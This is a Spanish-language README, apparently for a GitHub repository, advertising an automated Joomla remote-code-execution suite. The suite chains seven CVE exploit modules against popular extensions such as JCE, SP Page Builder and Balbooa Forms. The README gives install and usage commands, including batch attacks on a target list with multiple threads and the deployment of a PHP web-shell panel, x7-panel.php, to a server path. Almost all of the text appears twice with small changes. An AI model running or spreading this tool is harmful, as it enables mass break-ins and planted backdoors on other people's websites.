Suite RCE multi-CVE de Joomla con siete módulos de explotación para Balbooa Forms, Page Builder CK, SP Page Builder, JCE, iCagenda, Helix3 y SP LMS, además del despliegue de payload x7-panel.php.
Joomla Multi-CVE Suite — 7 módulos de vulnerabilidad + despliegue de x7-panel.php
| CVE | Extensión |
|---|---|
| CVE-2026-56291 | Balbooa Forms (com_baforms) |
| CVE-2026-56290 | Page Builder CK (com_pagebuilderck) |
| CVE-2026-48908 | SP Page Builder (com_sppagebuilder) |
| CVE-2026-48907 | JCE (com_jce) |
| CVE-2026-48939 | iCagenda (com_icagenda) |
| CVE-2026-49049 | Helix3 (plg_ajax_helix3) |
| CVE-2026-48909 | SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path |
La suite ejecuta una cadena automática; usa --cve para un solo módulo.
git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
| Archivo | Función |
|---|---|
winrarzips_brand.py | Banner de CMD (by winrarzips) |
joomla_exploits.py | Módulos de exploit 7-CVE |
CVE-2026-Joomla-Suite.py | CLI por lotes + objetivo único |
payloads/x7-panel.php | Panel RCE |
requirements.txt | Dependencias |
❌ Lista de objetivos, resultados de escaneo y URLs del panel no están en el repo.
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908
python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8
En objetivos Joomla < 5.2.2 se requiere la ruta del servidor:
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php
Joomla Multi-CVE Suite — 7 módulos de vulnerabilidad + despliegue de x7-panel.php
| CVE | Extensión |
|---|---|
| CVE-2026-56291 | Balbooa Forms (com_baforms) |
| CVE-2026-56290 | Page Builder CK (com_pagebuilderck) |
| CVE-2026-48908 | SP Page Builder (com_sppagebuilder) |
| CVE-2026-48907 | JCE (com_jce) |
| CVE-2026-48939 | iCagenda (com_icagenda) |
| CVE-2026-49049 | Helix3 (plg_ajax_helix3) |
| CVE-2026-48909 | SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path |
La suite ejecuta una cadena automática por defecto; usa --cve para un solo módulo.
git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
| Archivo | Función |
|---|---|
winrarzips_brand.py | Banner de CMD (by winrarzips) |
joomla_exploits.py | Módulos de exploit 7-CVE |
CVE-2026-Joomla-Suite.py | CLI por lotes + objetivo único |
payloads/x7-panel.php | Payload del panel RCE |
requirements.txt | Dependencias |
❌ Las listas de objetivos, los resultados de escaneo y las URLs del panel en vivo no están incluidas.
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908
python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8
Para objetivos Joomla < 5.2.2, proporciona la ruta del servidor:
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php